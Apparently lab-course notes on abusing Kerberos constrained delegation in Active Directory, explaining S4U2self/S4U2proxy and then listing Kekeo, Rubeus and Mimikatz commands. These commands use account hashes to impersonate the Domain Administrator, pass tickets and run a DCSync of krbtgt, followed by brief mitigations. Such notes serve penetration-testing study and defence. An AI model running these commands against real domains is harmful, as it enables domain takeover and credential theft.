Constrained Delegation

General

When enabled on a service account, allows access only to specified services on specified computers as a user
Typical scenario:
- User authenticates to a web service without Kerberos
- Web services makes requests to database server to fetch results based on the user's authorization
To impersonate the user, Service for User (S4U) extension is used which provides two extensions

Service for User to Self (S4U2self) Extension

Allows service to obtain a forwardable TGS to itself on behalf of a user
Only needs the user principal name but NO PASSWORD
Service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - T2A4D UserAccountControl attribute set

Service for User to Proxy (S4U2proxy) Extension

Allows service to obtain a TGS to a second service on behalf of a user
Uses the previously obtained TGS from S4U2self
Only allows access to services listed in the msDS-AllowedToDelegateTo attribute
Attribute contains list of SPNs to which the user tokens can be forwarded

Example Scenario: Constrained Delegation with Protocol Transition

User (Joe) authenticates to web service running under websvc service account using non-Kerberos method
Web service requests ticket from KDC for Joe without supplying a password, as the websvc account
KDC checks the websvc userAccountControl value for TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION attribute
If set, KDC checks that Joe's account is not blocked for delegation
If OK, KDC returns forwardable ticket for Joe's account (S4U2self)
Service passes ticket back to the KDC and requests a TGS for the CIFS/dcorp-mssql.dollarcorp.moneycorp.local service
KDC checks the msDS-AllowedToDelegateTo field on the websvc account
If SPN is listed there, KDC return TGS for dcorp-mssql (S4U2proxy)
Web service can now authenticate to the CIFS on dcorp-mssql as Joe using the obtained TGS

Exploitation

For Users with Constrained Delegation

Requires access to the user/service account
If we can access it, we can access all the listed services in msDS-AllowedToDelegateTo attribute
Can access the services as ANY user

# Enumerate users with constrained delegation enabled
# PowerView 3.0
Get-DomainUser -TrustedToAuth

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo} -ne "$null"} -Properties msDS-AllowedToDelegateTo

# Kekeo
# Request TGT for websvc user
tgt::ask /domain:dollarcorp.moneycorp.local /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f

# Request TGS using s4u in Kekeo and supplying the requested TGT
# Impersonate the Administrator Domain Admin
# We gain access to the CIFS service
tgs::s4u /tgt:tgt.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local

# Inject the ticket using mimikatz
Invoke-Mimikatz -Command '"kerberos::ptt tgs.kirbi"'

# We can do both steps at the same time using Rubeus
# Request TGT and TGS in a single command
.\Rubeus.exe s4u /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /ptt

# We can now access the CIFS service on dcorp-mssql as the dcorp\Administrator DA user
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$

For Computers with Constrained Delegation

Delegation occurs not only for specific service
Occurs for ANY service running under the same service account
No validation for SPN specified
Requires hash of the machine account of the computer running with constrained delegation

# Enumerate computers with constrained delegation enabled
# PowerView 3.0
Get-DomainComputer -TrustedToAuth

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo} -ne "$null"} -Properties msDS-AllowedToDelegateTo

# Kekeo
# Request TGT for machine account
tgt::ask /domain:dollarcorp.moneycorp.local /user:dcorp-adminsrv$ /rc4:5e77978a734e3a7f3895fb0fdbda3b96

# Using s4u, request TGS to access the LDAP service as the DA Adminstrator
tgs::s4u /tgt:tgt.kirbi /user:Administrator@dollarcorp.moneycorp.LOCAL /service:time/dcorp-dc.dollarcorp.moneycorp.local|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL

# Inject ticket into memory with Mimikatz
Invoke-Mimikatz -Command '"kerberos::ptt tgs.kirbi"'

# Request TGS and TGT at the same time with Rubeus
.\Rubeus.exe s4u /user:dcorp-adminsrv$ /rc4:5e77978a734e3a7f3895fb0fdbda3b96 /impersonateuser:Administrator /msdsspn:"time/dcorp-dc.dollarcorp.moneycorp.local" /altservice:ldap /ptt

# Execute DCSync attack with new permissions
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Mitigation

Disable Kerberos delegation where possible
Limit DA/Admin logins to specific services
Set "Account is sensitive and cannot be delegated" for privileged accounts

General

Service for User to Self (S4U2self) Extension

Service for User to Proxy (S4U2proxy) Extension

Example Scenario: Constrained Delegation with Protocol Transition

Exploitation

For Users with Constrained Delegation

For Computers with Constrained Delegation

Mitigation

Further Reading